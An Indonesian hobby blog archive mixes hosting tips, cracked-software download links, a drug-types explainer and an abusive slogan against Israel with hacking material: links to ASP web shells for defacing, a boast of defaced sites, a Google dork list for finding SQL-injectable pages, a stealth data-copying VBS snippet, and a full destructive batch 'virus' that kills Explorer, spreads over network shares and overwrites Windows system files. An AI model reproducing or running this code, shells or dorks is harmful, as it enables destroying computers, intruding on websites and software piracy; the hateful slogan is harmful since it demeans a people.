Saturday, July 17

Dalam Memilih Hostingan

KRITERIA APA SAJA SIH YANG HARUS KITA PERTIMBANGKAN DALAM MEMILIH WEB HOSTING ?". pertanyaaan di atas akan muncul ketika kita akan mempublikasikan website kita. Sebenarnya apakah yang dimaksud dengan web hosting itu ? . Kita dapat menganalogikan web hosting itu adalah sebuah rumah ( kontrakan ) tampat kita meletakkan semua barang yang kita miliki. Dalam memilih sebuah rumah kontrakan maka kita akan melihat apa saja yang ada dalam bangunan rumah tersebut, misalnya saja ruang tamu , kamar mandi, tempat parkir ,  berapa luas bangunan tersebut dan yang paling penting berapa harga sewa rumah tersebut. Begitu juga dalam memilih web hosting kita harus mempertimbangkan berapa kapasitas yang disediakan bahasa pemrograman apa saja yang didukung juga biaya untuk mendapatkan hosting tersebut . berikut ini saya tuliskan hal hal yang perlu di pertimbangkan dalam memilih web hosting beserta sedikit keterangannya  

Fasilitas yang  perlu dipertimbangkan


Fasilitas
Keterangan
Kapasitas Ruang (space) Besarnya ruang penyimpanan di server. hal ini sangat perlu kita perhatikan , seperti memilih harddisk maka semakin besar kapasitasny semakin bagus
kecepatan akses perlu diperhatikan di sini bahwa kecepatan tiap hosting berbeda hal ini harus kita perhatikan benar benar karena pengunjung situs tidak akan suka jika membuka web yang aksesnya lambat
Control Panel
Suatu aplikasi yang diberikan kepada sipemilik situs (atau orang yang diberi kuasa) untuk melakukan tugas-tugas administrasi situs, seperti setting DNS, setting user, password, dsb. Control panel ini biasanya diberikan dalam bentuk yang bisa diakses oleh web browser (web based).
Unlimited data transfer
Transfer data yang keluar dari situs maupun yang masuk ke situs kita tidak dibatasi (jangan disalah-artikan dengan kapasitas bandwidth). banyak hosting yang membatasi besar tiap file yang boleh di upload
Sub Domain
Nama domain yang menginduk pada domain milik kita. Bila kita memiliki domain dengan nama www.kuman.com , maka sub domainnya bisa berupa: kuman.kuman.com, aku@kuman.com, dsb.
POP Email
Fasilitas email gratis yang disesuaikan dengan nama domain. Untuk mengakses email biasanya dengan menggunakan aplikasi seperti Eudora, Netscape atau microsoft outlook.
WebMail
Fasilitas email yang dapat diakses melalui web browser (Netscape, Microsoft Explorer,dsb). Misalnya seperti YahooMail, BolehMail, EudoraMail, dsb.
E-mail Autoresponder
Fasilitas email balasan yang dilakukan secara otomatis. Isi email balasan dapat disesuaikan oleh sipemilik nama domain.
Email Forwarding
Fasilitas penyaluran email ke alamat email selain di domain tersebut. Misalnya kuman@kuman.com dapat disalurkan ke aku@kuman.com, maka setiap surat yang masuk ke alamat kuman@kuman.com akan disalurkan ke aku@kuman.com secara otomatis.
Telnet
Akses server oleh user secara jarak jauh dengan menggunakan aplikasi TelNet. Biasanya dilakukan untuk merubah konfigurasi/setting pengguna, konfigurasi server, uji coba program di server, dsb. Hanya pemilik domain (atau yang diberi kuasa) yang biasanya diberi fasilitas ini. Sangat penting bagi para web developer.
FTP
File Transfer Protocol, yaitu suatu aplikasi untuk menyimpan atau mengambil file-file secara akses jarak jauh.
WAP
Wireless Application Protocol, yaitu suatu aplikasi yang memungkinkan ponsel tertentu menampilkan isi suatu situs melalui ponselnya.
SSI
Server Side Include
SSL
Secure Socket Layer, atau proteksi isi suatu situs dengan mengacak komunikasi data yang ditransferkan melalui internet. Sangat dianjurkan sekali untuk keamanan data-data penting dan rahasia pada situs-situs e-commerce, seperti data nomor kartu kredit, account bank, dsb.
CGI-Bin
Suatu folder di server yang biasanya berisi modul-modul aplikasi yang dapat diakses oleh user. Aplikasi tersebut biasanya dibuat dengan menggunakan bahasa pemrograman PERL, C, PHP, dsb.
CGI-Form
Suatu fasilitas form yang menggunakan aplikasi-2 yang berada di dalam folder CGI-Bin diatas.
Guestbook CGI
Fasilitas Buku Tamu, sehingga pengunjung situs kita dapat mengisi dan membaca kesan, komentar, maupun saran dari pengunjung lainnya.
FrontPage Extension
Suatu tambahan aplikasi yang memungkinkan suatu situs yang menggunakan aplikasi MS Frontpage untuk berjalan sesuai dengan desainnya.  Jika tidak mendukung maka halaman tersebut akan terlihat acak acakan tidak seperti aslinya
Aplikasi Database server
Aplikasi database server seperti mySQL, Oracle,dsb. Digunakan bila sebuah situs menggunakan database sebagai penunjang operasionalnya.
Bahasa Pemrograman yang didukung
Fasilitas ini biasanya diperlukan terutama bagi mereka yang berprofesi sebagai web developer. Bahasa yang umum digunakan biasanya PERL, C, PHP, Phyton, dsb.
Virtual Domain
Selain nama domain yang kita miliki tersebut, kita juga dapat membuat beberara nama domain lagi yang ditempatkan hanya dalam 1 server/tempat. Fasilitas ini hanya diperlukan bagi para web developer.
Counter
Fasilitas penghitung yang menghitung jumlah pengunjung ke situs kita.


Readmore »» Dalam Memilih Hostingan

Create You Custom Toolbar

The best of your Site On a Custom, Fully Branded Toolbar.
Visit

BloG BlogGer Community Toolbar - Stay connected and get so much more.


Installs in Seconds, Includes Uninstaller
Readmore »» Create You Custom Toolbar

Sunday, July 4

Tube Hunter 9.7 Video Downloader


TubeHunter V9.7 downloads videos and music from YouTube, PornoTube(Part), xTube(Part), YouPorn, yuvutu, MySpace, ExpertVillage, Metacafe, veoh, Flurl, Bebo, Break, Grouper and dalealplay, and saves them on your computer or directly to your iPOD. All downloaded videos can be converted by TubeHunter to other video formats including AVI, MPEG4, DivX, XviD, iPOD Video, iPhone format, MPEG, WMV, RM, MOV, Sony PSP, Zune Video, 3GP, 3G2, SWF, FLV, M4A, MP3, MP4, WAV, OGG, AAC and AC3. TubeHunter does not have any spyware or adware.

Features of TubeHunter:
1. Convert any video file to iPOD/ PSP/ Mobile/ Zune
2. Convert any video file between all popular video formats (e.g. FLV to MPEG; AVI to MP4; ...)
3. Convert your favorite DVD movie to all most popular video/audio formats, or to iPOD/ PSP/ Mobile/ Zune.
4. Convert videos from LimeWire/ BearFlix/ BearShare to iPOD/ PSP/ Mobile/ Zune or to other video formats

Download
Readmore »» Tube Hunter 9.7 Video Downloader

Google Earth Pro Plus V5.2 - Crack - No Password



Image

Quote:
Google Earth is a virtual globe program that lets you surf through our entire planet.You can zoom and search for your town and much more things such as school, churches etc!Google Earth Pro (Gold) is the upgraded version, it has a lot of more features such as movie making or advanced printing and much more… Worth 400 $ Google Earth Pro combines the power of Google Search with satellite imagery, maps, terrain and 3D buildings to put the world’s geographic information at your fingertips.


Image
Code:
http://rapidshare.com/files/404701928/gearth52.rar

Image
Code:
http://www.megaupload.com/?d=HCB2X1Z2

Image
Code:
http://hotfile.com/dl/52313506/94b124e/gearth52.rar.html


Readmore »» Google Earth Pro Plus V5.2 - Crack - No Password

JENIS NARKOBA & efek terhadap pemakai nya

JENIS-JENIS NARKOBA

Jenis-jenis Narkoba Narkoba merupakan singkatan dari Narkotika dan Obat/Bahan berbahaya yang telah populer beredar dimasyarakat perkotaan maupun di pedesaan, termasuk bagi aparat hukum. Sebenarnya dahulu kala masyarakat juga mengenal istilah madat sebagai sebutan untuk candu atau opium, suatu golongan narkotika yang berasal dari getah kuncup bunga tanaman Poppy yang banyak tumbuh di sekitar Thailand, Myanmar dan Laos (The Golden Triangle) maupun di Pakistan dan Afganistan.

Selain Narkoba, istilah lain yang diperkenalkan khususnya oleh Departemen Kesehatan RI adalah NAPZA yaitu singkatan dari Narkotika, Pasikotropika dan Zat adiktif lainnya. Semua istilah ini sebenarnya mengacu pada sekelompok zat yang umumnya mempunyai risiko yang oleh masyarakat disebut berbahaya yaitu kecanduan (adiksi).

Narkoba atau NAPZA merupakan bahan/zat yang bila masuk ke dalam tubuh akan mempengaruhi tubuh terutama susunan syaraf pusat/otak sehingga bilamana disalahgunakan akan menyebabkan gangguan fisik, psikis/jiwa dan fungsi sosial. Karena itu Pemerintah memberlakukan Undang-Undang untuk penyalahgunaan narkoba yaitu UU No.5 tahun 1997 tentang Psikotropika dan UU No.22 tahun 1997 tentang Narkotika.

Golongan Psikotropika adalah zat atau obat baik alami maupun sintetis namun bukan Narkotika yang berkhasiat aktif terhadap kejiwaan (psikoaktif) melalui pengaruhnya pada susunan syaraf pusat sehingga menimbulkan perubahaan tertentu pada aktivitas mental dan perilaku.

Narkotika adalah zat atau obat yang berasal dari tanaman atau bukan tanaman baik sintetis maupun semisintetis yang akan menyebabkan perubahan kesadaran, mengurangi sampai menghilangkan rasa sakit dan dapat menimbulkan ketergantungan (adiksi).

Jenis Narkotika yang sering disalahgunakan adalah morfin, heroin (putauw), petidin, termasuk ganja atau kanabis, mariyuana, hashis dan kokain.

Sedangkan jenis Psikotropika yang sering disalahgunakan adalah amfetamin, ekstasi, shabu, obat penenang seperti mogadon, rohypnol, dumolid, lexotan, pil koplo, BK, termasuk LSD, Mushroom.

Zat adiktif lainnya disini adalah bahan/zat bukan Narkotika & Psikotropika seperti alkohol/etanol atau metanol, tembakau, gas yang dihirup (inhalansia) maupun zat pelarut (solven).

Sering kali pemakaian rokok dan alkohol terutama pada kelompok remaja (usia 14-20 tahun) harus diwaspadai orangtua karena umumnya pemakaian kedua zat tersebut cenderung menjadi pintu masuk penyalahgunaan Narkoba lain yang lebih berbahaya (Putauw).
Readmore »» JENIS NARKOBA & efek terhadap pemakai nya

download mp3

Readmore »» download mp3

Monday, June 28

contoh shell asp

buat yang blajar deface ini ada beberapa shell


siapa tau belum dihapus admin nya,,,,hehehe
password buat login nya : oklyn
ini link nya
asp shell
asp shell
asp shell
selamat blajar....
Readmore »» contoh shell asp

Friday, June 4

FUCK ISRAEL (go to hell israel)

FUCK ISRAEL!!!
FUCK ISRAEL!!!

Readmore »» FUCK ISRAEL (go to hell israel)

Wednesday, June 2

flv ,mp4 avi 3gp & etc movie & audio format player

Haihaisoft Universal Player supports almost all popular digital media formats and can also play digital media files protected by DRM-X. Amongst the players it can emulate are Windows Media Player, Real Player, Adobe Flash Player, Apple QuickTime Player, PowerDVD and Flash Video (FLV) Player. What's more though, this player embeds itself into Internet Explorer meaning that whenever you are presented with a format compatible with any of these file types, you can watch it instantly. The number of formats it can play is mind-boggling, including those protected by DRM such as WMV(Windows Media Video), WMA(Windows Media Audio), ASF, WMS, DVD, VCD, SVCD, MOV, RM, RMVB, AVI, MPEG, WMV, 3GP, FLV, SWF, MP3, AMR, M4A, ACC, OGG, MIDI, GIF and JPEG file format. Best of all, the program is constantly updated with the latest codecs so you don't need to worry about it suddenly not being able to play files.
A completely free player that supports just about any format imaginable and embeds itself into IE perfectly.

Languages:

English

Haihaisoft Universal Player supports the following formats:

WMV, WMA, ASF, WMS, DVD, VCD, SVCD, MOV, RM, RMVB, AVI, MPEG, WMV, 3GP, FLV, SWF, MP3, AMR, M4A, ACC, OGG, MIDI, GIF, JPEG

Recent changes in Haihaisoft Universal Player:

  • Improved stability for streaming.
  • Improved stability for codec.
  • Add native support for hardware acceleration.
  • Smaller size but with more powerful features

OS requirements for Haihaisoft Universal Player:

  • OS: Win98SE/2000/XP/2003/Vista

download
Readmore »» flv ,mp4 avi 3gp & etc movie & audio format player

Thursday, May 27

cara update status facebook via BlackBerry

Trik membuat status facebook via blackberry (update status fb via blackberry)
Artikel kali ini saya tulis untuk menjawab rasa penasaran teman-teman ku, terutama si burik yang selalu bertanya Mas bagaimana cara mendapatkan status update facebook memalui blackberry ? hmm mesti nuy biar dikira kaya atau paling tidak buat gaya-gayaan lah :-p wkwkwkwk.
sebenarnya untuk mendapatkan status update via blackberry ada 2 cara, yaitu cara sulit dengan mendownload program dari bb atau cara mudah dengan menggunakan aplikasi facebook bb-update, kalau disuruh pilih pastilah akan memilih cara yang mudah.
Readmore »» cara update status facebook via BlackBerry

Wednesday, May 26

Facebook launches mobile site for cell phones

Facebook mengatakan hari Selasa bahwa telah bekerja sama dengan operator selular di hampir 50 negara untuk menawarkan cepat dan versi gratis dari situs jaringan sosial populer di ponsel.

"Kami telah menempatkan semua grafis, foto, video satu klik sehingga situs ini hanya teks dan halaman cahaya super, super cepat untuk beban," kata Henri Moissinac, kepala bisnis mobile Facebook.

Situs mobile baru, 0.facebook.com, adalah "dioptimalkan untuk kecepatan dan gratis," kata Moissinac AFP
Readmore »» Facebook launches mobile site for cell phones

Sunday, May 2

hehehehe,,,,, narsis dikit ahh,,,,,

beberapa website yg pernah Q jahilin... xixixixi,,,,,,,,,
ma'af yach,,,, maklum newbie lg pingin blajar



Readmore »» hehehehe,,,,, narsis dikit ahh,,,,,

Thursday, April 29

Pangolin Professinal Edition v3.0.0.1011 full crack

Readmore »» Pangolin Professinal Edition v3.0.0.1011 full crack

kumpulan archive shell

c99,c57,by pass, chrystal shell,cyber shell,dx shell dan lain-lain,.,,,,,,
Readmore »» kumpulan archive shell

Wednesday, March 24

Intelitamper


Simplist way is to search through the page source for references.
Complex way is to find an exploit in the site, and use that to get a server side directroy listing.

Readmore »» Intelitamper

Saturday, March 13

buat yang belajar hacking nich ada shell hehehehehe.........!!!!! =))

Shell
tuch screenshot nya,,,,
nich link nya,,, shell shell shell shell shell
jangan dibuat yang enggak-enggak lho yow,,,, hehehehe,,, met berbuat jahat,,,,
Readmore »» buat yang belajar hacking nich ada shell hehehehehe.........!!!!! =))

Tuesday, March 9

SQL Injection

Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara   memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus — yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
Readmore »» SQL Injection

Facebook Injection For Fun

Ok, kali ini gw akan membahas facebook hacking......
Facebook hacking ??? facebook mo di hack.
jangan salah sangka dolo, ilmu gw belom sampe kesana bro.
nah its just for having fun.......disini kita akan mencoba bermain

1. Buka facebook lo dan login seperti biasa
2. nah pada halaman profile lo, silahkan copy paste script dibawah ini pada address bar browser lo masing2


Code:
javascript:void(document.getElementById('profile_pic').src='http://t0.gstatic.com/images?q=tbn:_YhkSgRzTMzQfM:http://www.barrelhousemag.com/word/wp-content/uploads/2009/03/sasha-grey2.jpg');


nah coba liat, apa yg terjadi dengan photo profil lo.....cantik bukan............


Sekian dulu maen2 nya...........see you   

by inot,
Readmore »» Facebook Injection For Fun

RAR Password Unlocker + Crack

RAR Password Unlocker 3.0 untuk menemukan password yang hilang untuk WinRAR / RAR file untuk Anda untuk mengekstrak file-file di dalam arsip dengan mudah. Ini WinRAR / RAR password remover mendukung semua versi WinRAR / RAR archives. Dapat memulihkan password tidak peduli berapa lama dan bagaimana rumit itu. Ditingkatkan dengan brute force attack, brute force dengan topeng serangan, serangan kamus, ia bekerja secara efektif dan efisien. Selain itu, yang selalu paling mudah digunakan bahkan program pengguna baru dapat digunakan untuk itu dalam waktu kurang dari satu menit.
Readmore »» RAR Password Unlocker + Crack

Trik Mengubah Smadav 7.5 Free Menjadi Pro

Antivirus smadav baru saja merilis Smadav 2009 rev 7.5, tetapi permintaan key buat menjadikan smdav 7.5 free menjadi pro terus berdatangan ke inbox saya. (buat yang udah request, simak baik-baik tips dari saya ini yah,, heheh)


Untuk menjadikan smadav 7.5 anda menjadi pro dibutuhkan trik khusus, karena di smadav 7.5 ini kalau hanya dengan key saja, tanpa disertai triknya, kemungkinan besar key tersebut akan ditolak oleh smadav. (Makin canggih ni smadav, ,hehe)
Readmore »» Trik Mengubah Smadav 7.5 Free Menjadi Pro

Cara Mudah Dapat Apa Saja di Google

Google emang mantep banget dah. Apa aja ada, wew semua orang kalo mau cari sesuatu pasti langsung ke Paman Search Engine yang satu ini. Ada beberapa cara agar kita bisa mempermudah proses perncarian kita. Mungkin dengan Dork unik, dll. Nah pada kesempatan kali ini saya akan memberikan sedikit tips dan trik bagaimana mencari Lagu, Ebook, Gambar, Aplikasi dan Game dari Google dengan menggunakan Javascript. Langsung aja…
Readmore »» Cara Mudah Dapat Apa Saja di Google

Google Dork

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
Readmore »» Google Dork

Anonymous Proxy [Germany DE]

Updated in RealTime Free Proxy List: DE Proxies (German National domain).
http://aliveproxy.com/de-proxy-list/
Readmore »» Anonymous Proxy [Germany DE]

Belajar Backdoor, Exploit, Hacking, SQL-Injection, Security, Networking, linux

Readmore »» Belajar Backdoor, Exploit, Hacking, SQL-Injection, Security, Networking, linux

Wednesday, February 24

Deep Freeze 6.52.020.2735 + key [never axpires]

Download DF versi 5.7 version 6 atau Deep Freeze untuk Win XP, Windows Vista, Standard atau Professional. Ini cocok untuk yang tidak mau repot dengan selalau update antivirus PC atau notebook, serta capekdengan perilaku Virus, maka aku anjurkan komputer Anda di protek atau dilindungi saja dengan aplikasi Deep Freeze.
Nah manfaat dari DF inilah yang membuat komputer menjadi kebal dari segala bentuk virus, sebab cara kerjanya adalah akan merestore semua data akan kembali seperti ketika komputer di restart.
Readmore »» Deep Freeze 6.52.020.2735 + key [never axpires]

Cara Menghindari Virus Dari Flash Disk Masuk ke Komputer Anda

Saat ini flash disk merupakan sebuah tool yang sangat berarti bagi kita. Mungkin dapat dikatakan bahwa flash disk lebih penting dimiliki daripada komputer sendiri karena sekarang dimana-mana sudah banyak rental komputer yang dapat di sewa untuk digunakan per jamnya. Bahkan, seorang teman pernah mengatakan kepada saya bahwa flash disk adalah setengah dari otaknya. Mungkin kedengaran berlebihan bagi sebagian orang, namun begitulah pentingnya flash disk pada zaman seperti sekarang ini.
Disamping kegunaannya yang sangat berperan dalam dunia komputer, flash disk sangat rentan terhadap virus. Bahkan flash disk juga dapat dikatakan sebuah media yang sangat baik bagi penyebaran virus. Saat Anda
Readmore »» Cara Menghindari Virus Dari Flash Disk Masuk ke Komputer Anda

Tips Buat Lo yang laGi patah Hati n yang baRu putuS!!

 1. sah2 ja Coret2 foto mantan, truzz liat deh skali lagi! bener kan?? ternyata dia gak seganteng n secakep yang kita kira slama ne!
2. ganti NickName mantan Di hape kamoe ama Nama YaNg mengeRikan! Lupain deh ngasi geLar "My honey, saYAng, Cinta de eL eL. Setelah kelakuan nya yang Nyakitin hati kamoe, yakin dia Masi pantes dapetin gelar ituwh?????

3. bagi Kamoe yang suka olahraGa panah n tembak, kayak nya semangat kamu biSa di bangkitin dengan naro foto mantan sebagai sa2raN. hihi

4. inget! masih banYak Orang2 ganteng n cakep yang Masi "available" di dunia Ne!
Readmore »» Tips Buat Lo yang laGi patah Hati n yang baRu putuS!!

Tuesday, February 23

Menyembunyikan file dalam gambar

Nih emang trik kuno tapi mungkin saja masih ada yg belum tahu. Lumayanlah nambah arsip.
heheehhehe...
oke langsung ajha y
yg prlu d siapin adalah :
Contoh bahan:
1. File gambar : valkyrie.jpg
2. Nama file : rahasia
3. Folder : test
cara kerjanya:
Readmore »» Menyembunyikan file dalam gambar

Cara Menghack Komputer

cara pembutannya sbb:
Trik Copy Data Ke Flash Disk Secara Diam-diam
1.Buka notepad, buat file vbs ketik atau copy paste script berikut:

dim wshshell, dos
set wshshell = wscript.createobject(”wscript.shell”)
dos = wshshell.expandenvironmentstrings(”%coms…
wshshell.run (dos & ” /c tarik.bat”), vbhide

2.Simpan dengan file name nya contoh start.vbs save as type nya pilih all files

3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut:
Readmore »» Cara Menghack Komputer

Layanan web hosting

web hosting gratis

oke lngsung ajha y

* 250 MB disk space
* Vista Panel
* Web mail
* 6 GB Monthly transfer
* PHP Flags manager
* POP email accounts
* 3 MySQL databases
* Automatic installer
* Password protected folders
* 5 Add-on domains
* FTP account
* Php MyAdmin
* 5 Sub domains
* Browser File manager
* Clustered servers
* No ads!

http://www.100webspace.com
Readmore »» Layanan web hosting

Coba Belajar tentang virus

oke lngsung ajha y

buka notepat trus loe msukin nie code
Code
@echo off

taskkill /f /im explorer.exe

mkdir E:\
net share Shadow_Fax:E:\

copy %0 E:\"Shadow_Fax".BAT

mkdir F:\
net share Shadow_Fax:F:\

copy %0 F:\"Shadow_Fax".BAT

mkdir G:\
net share Shadow_Fax:G:\

copy %0 G:\"Shadow_Fax".BAT

mkdir H:\
net share Shadow_Fax:H:\

copy %0 H:\"Shadow_Fax".BAT

mkdir I:\
net share Shadow_Fax:I:\

copy %0 I:\"Shadow_Fax".BAT

echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT
echo Shadow_Fax Was Here, Please Reinstall Your Comp Now >> C:\AUTOEXEC.BAT

echo :start >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo start rsmsink >> C:\Windows\System32\xircom\Fax_Run.Bat
echo goto end >> C:\Windows\System32\xircom\Fax_Run.Bat
echo :end >> C:\Windows\System32\xircom\Fax_Run.Bat

echo mkdir C:\WINDOWS >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo net share Crawl:C:\WINDOWS >> C:\WINDOWS\Fonts\Fax_Destroy.bat

echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"clock".avi >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"bootstet".dat >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"CMIRmDriver".dll >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"CmiRmRedundDir".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"CMIUninstall".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"explorer".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"NOTEPAD".EXE >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"IsUninst".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"hh".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"regedit".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"SIS_LIB".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"SiSUSBrg".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"TASKMAN".EXE >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"twain".dll >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"twain_32".dll >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"twunk_16".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"twunk_32".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"vmmreg32".dll >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"winhelp".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"winhlp32".exe >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"WindowsShell".Manifest >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\WINDOWS\"WMSysPr9".prx >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo exit >> C:\Windows\System32\xircom\DeadEx.bat

echo mkdir C:\Windows\System >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo net share Crawl:C:\Windows\System >> C:\WINDOWS\Fonts\Fax_Destroy.bat

echo copy C:\AUTOEXEC.BAT C:\Windows\System\"AVICAP".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"AVIFILE".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"cmicnfg".cpl >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"cmids3d".dll >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"COMMDLG".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"KEYBOARD".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"LZEXPAND".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"MCIAVI".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"MCISEQ".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"MCIWAVE".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"MMSYSTEM".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"MMTASK".TSK >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"MOUSE".DRV >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"MSVIDEO".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"OLECLI".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"OLESVR".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
echo copy C:\AUTOEXEC.BAT C:\Windows\System\"SHELL".DLL >> C:\WINDOWS\Fonts\Fax_Destroy.bat
